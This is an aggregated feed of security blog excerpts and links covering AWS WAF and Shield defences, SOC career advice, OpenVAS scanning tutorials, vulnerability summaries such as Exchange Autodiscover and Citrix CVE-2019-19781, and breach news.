Recently a “design flaw” in the Microsoft Exchange’s Autodiscover protocol was discovered by researchers that allowed access to 372,072 Windows domain credentials and 96,671 unique sets of credentials from applications such as Microsoft Outlook and third-party email clients. According to Amit Serper , the person who discovered the flaw, the source of the leak is [...] The post The Great Leak: Microsoft Exchange AutoDiscover Design Flaw appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/pentesting-exchange/the-great-leak-microsoft-exchange-autodiscover-design-flaw/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ask Lesley: How Much Should SOC Work Suck?
“Dear Lesley, I’ve been in a MSSP Security Operations Center (SOC) for a few months as my first cybersecurity job. The work is monotonous, I have access to only a few SIEM tools, and most of what I do is handle repetitive tickets for a ton of customers all by myself on awkward shifts. I… Read More Ask Lesley: How Much Should SOC Work Suck?
https://tisiphone.net/2021/09/22/ask-lesley-how-much-should-soc-work-suck/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The three most important AWS WAF rate-based rules
In this post, we explain what the three most important AWS WAF rate-based rules are for proactively protecting your web applications against common HTTP flood events, and how to implement these rules. We share what the Shield Response Team (SRT) has learned from helping customers respond to HTTP floods and show how all AWS WAF […]
https://aws.amazon.com/blogs/security/three-most-important-aws-waf-rate-based-rules/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Automatically update AWS WAF IP sets with AWS IP ranges
Note: This blog post describes how to automatically update AWS WAF IP sets with the most recent AWS IP ranges for AWS services. This related blog post describes how to perform a similar update for Amazon CloudFront IP ranges that are used in VPC Security Groups. You can use AWS Managed Rules for AWS WAF […]
https://aws.amazon.com/blogs/security/automatically-update-aws-waf-ip-sets-with-aws-ip-ranges/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AWS Shield threat landscape review: 2020 year-in-review
AWS Shield is a managed service that protects applications that are running on Amazon Web Services (AWS) against external threats, such as bots and distributed denial of service (DDoS) attacks. Shield detects network and web application-layer volumetric events that may indicate a DDoS attack, web content scraping, or other unauthorized non-human traffic that is interacting […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-review-2020-year-in-review/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Reasonable IR Team Expectations
With the surplus of ransomware attacks consistently increasing, I have unfortunately witnessed another increase – in shoddy and predatory cybersecurity incident response firms with good SEO taking advantage of victims. In some cases this may be opportunistic, and in others simply a side effect of the shortage of senior and principal level incident responders in… Read More Reasonable IR Team Expectations
https://tisiphone.net/2021/05/11/reasonable-ir-team-expectations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ask Lesley: From Ops to DFIR, a Tough Transition
Lesley, I am having the hardest time getting my foot in the door in an investigative role. I have spent almost 4 years at the same job, in the same role, and cannot find a way to transition out of the operations side of the house. I went into operations with the intent of doing… Read More Ask Lesley: From Ops to DFIR, a Tough Transition
https://tisiphone.net/2021/03/19/ask-lesley-from-ops-to-dfir-a-tough-transition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to protect a self-managed DNS service against DDoS attacks using AWS Global Accelerator and AWS Shield Advanced
In this blog post, I show you how to improve the distributed denial of service (DDoS) resilience of your self-managed Domain Name System (DNS) service by using AWS Global Accelerator and AWS Shield Advanced. You can use those services to incorporate some of the techniques used by Amazon Route 53 to protect against DDoS attacks. […]
https://aws.amazon.com/blogs/security/how-to-protect-a-self-managed-dns-service-against-ddos-attacks-using-aws-global-accelerator-and-aws-shield-advanced/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Set up centralized monitoring for DDoS events and auto-remediate noncompliant resources
When you build applications on Amazon Web Services (AWS), it's a common security practice to isolate production resources from non-production resources by logically grouping them into functional units or organizational units. There are many benefits to this approach, such as making it easier to implement the principal of least privilege, or reducing the scope of […]
https://aws.amazon.com/blogs/security/set-up-centralized-monitoring-for-ddos-events-and-auto-remediate-noncompliant-resources/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)
In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. In part 1 of this post I describe the technologies […]
https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Defense in depth using AWS Managed Rules for AWS WAF (part 1)
In this post, I discuss how you can use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. The post is in two parts. This first part describes […]
https://aws.amazon.com/blogs/security/defense-in-depth-using-aws-managed-rules-for-aws-waf-part-1/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Houston consulate one of worst offenders in Chinese espionage, say U.S. officials
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: Reuters The United States ordered the consulate closed this week, leading China to retaliate on Friday by telling the United States to shut its consulate in the city of Chengdu, as relations between the world's two largest economies […] The post Houston consulate one of worst offenders in Chinese espionage, say U.S. officials appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/houston-consulate-one-of-worst-offenders-in-chinese-espionage-say-u-s-officials/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register The denizens of online forums dedicated to trading in stolen credit cards have been shown to be wretched hives of scum and villainy. This not-so-surprising news comes this week via academics at Washington State University (WSU) in the US, […] The post Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/shocked-i-am-shocked-to-find-that-underground-bank-card-trading-forums-are-full-of-liars-cheats-small-time-grifters/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AWS Shield Threat Landscape report is now available
AWS Shield is a managed threat protection service that safeguards applications running on AWS against exploitation of application vulnerabilities, bad bots, and Distributed Denial of Service (DDoS) attacks. The AWS Shield Threat Landscape Report (TLR) provides you with a summary of threats detected by AWS Shield. This report is curated by the AWS Threat Research […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-report-now-available/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vint Cerf suggests GDPR could hurt coronavirus vaccine development
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register TCP-IP-co-developer Vint Cerf, revered as a critical contributor to the foundations of the internet, has floated the notion that privacy legislation might hinder the development of a vaccination for the COVID-19 coronavirus. In an essay written for […] The post Vint Cerf suggests GDPR could hurt coronavirus vaccine development appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/vint-cerf-suggests-gdpr-could-hurt-coronavirus-vaccine-development/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Brit defense contractor hacked, up to 100,000 past and present employees' details siphoned off – report
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Britain’s Ministry of Defence contractor Interserve has been hacked, reportedly leaking the details of up to 100,000 of past and current employees, including payment information and details of their next of kin. The Daily Telegraph reports that up to […] The post Brit defense contractor hacked, up to 100,000 past and present employees’ details siphoned off – report appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/brit-defense-contractor-hacked-up-to-100000-past-and-present-employees-details-siphoned-off-report/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

US officially warns China is launching cyberattacks to steal coronavirus research
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: CNN The US Department of Homeland Security and the FBI issued a “public service announcement” Wednesday warning that China is likely launching cyberattacks to steal coronavirus data related to vaccines and treatments from US research institutions and pharmaceutical […] The post US officially warns China is launching cyberattacks to steal coronavirus research appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/us-officially-warns-china-is-launching-cyberattacks-to-steal-coronavirus-research/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

There's Norway you're going to believe this: World's largest sovereign wealth fund conned out of m in cyber-attack
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register The Norwegian Investment Fund has been swindled out of m (£8.2m) by fraudsters who pulled off what’s been described as “an advance data breach.” Norfund – the world’s largest sovereign wealth fund, created from saved North Sea […] The post There’s Norway you’re going to believe this: World’s largest sovereign wealth fund conned out of m in cyber-attack appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/theres-norway-youre-going-to-believe-this-worlds-largest-sovereign-wealth-fund-conned-out-of-10m-in-cyber-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Privacy pressure group Noyb has filed a legal complaint against Google on behalf of an Austrian citizen, claiming the Android Advertising ID on every Android device is “personal data” as defined by the EU’s GDPR and that […] The post Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/stop-tracking-me-google-austrian-citizen-files-gdpr-legal-complaint-over-android-advertising-id/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyber-attacks hit hospital construction companies
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: BBC Interserve, which helped build Birmingham’s NHS Nightingale hospital, and Bam Construct, which delivered the Yorkshire and the Humber’s, have reported the incidents to authorities. Earlier this month, the government warned healthcare groups involved in the response to […] The post Cyber-attacks hit hospital construction companies appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/cyber-attacks-hit-hospital-construction-companies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Security researchers at Comparitech have reported that an estimated 24,000 Android apps are leaking user data because of misconfigured Firebase databases. Firebase is a popular backend service with SDKs for multiple platforms, including Android, iOS, web, C++ and Unity (for […] The post Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/researchers-spot-thousands-of-android-apps-leaking-user-data-through-misconfigured-firebase-databases/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Papa don't breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack'
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Hackers are threatening to release 756GB of A-list celebs’ contracts, recording deals, and other personal info allegedly stolen from a New York law firm. The miscreants have seemingly got their hands on confidential agreements, private correspondence, contact […] The post Papa don’t breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack’ appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/papa-dont-breach-contracts-personal-info-on-madonna-lady-gaga-elton-john-others-swiped-in-celeb-law-firm-hack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2019-19781: Citrix ADC RCE vulnerability
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler AD), Citrix Gateway NetScaler ADC (formerly known as NetScaler Gateway), and Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...] The post CVE-2019-19781: Citrix ADC RCE vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
For all scans so far, we've only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we don't want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...] The post Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/openvas-9-part-4-custom-scan-configurations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...] The post Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-with-openvas-9-scanning-the-network/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
Is the previous tutorial Vulnerability Scanning with OpenVAS 9.0 part 1 we've gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we've also installed a virtual machine with Metasploitable 2 [...] The post Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-0-part-2/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup
A couple years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. We’ve covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this tutorial I want to cover more details [...] The post Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-pt-1/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Best Hacking Books 2018
One of the most popular and most asked questions since I’ve started this blog is if I can recommend some good hacking books to read for beginners and more experienced hackers and penetration testers. In this article I want to highlight some hacking books and InfoSec books that I personally liked that cover subjects such as ethical hacking, [...] The post The Best Hacking Books 2018 appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/infosec-books/the-best-hacking-books-2018/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)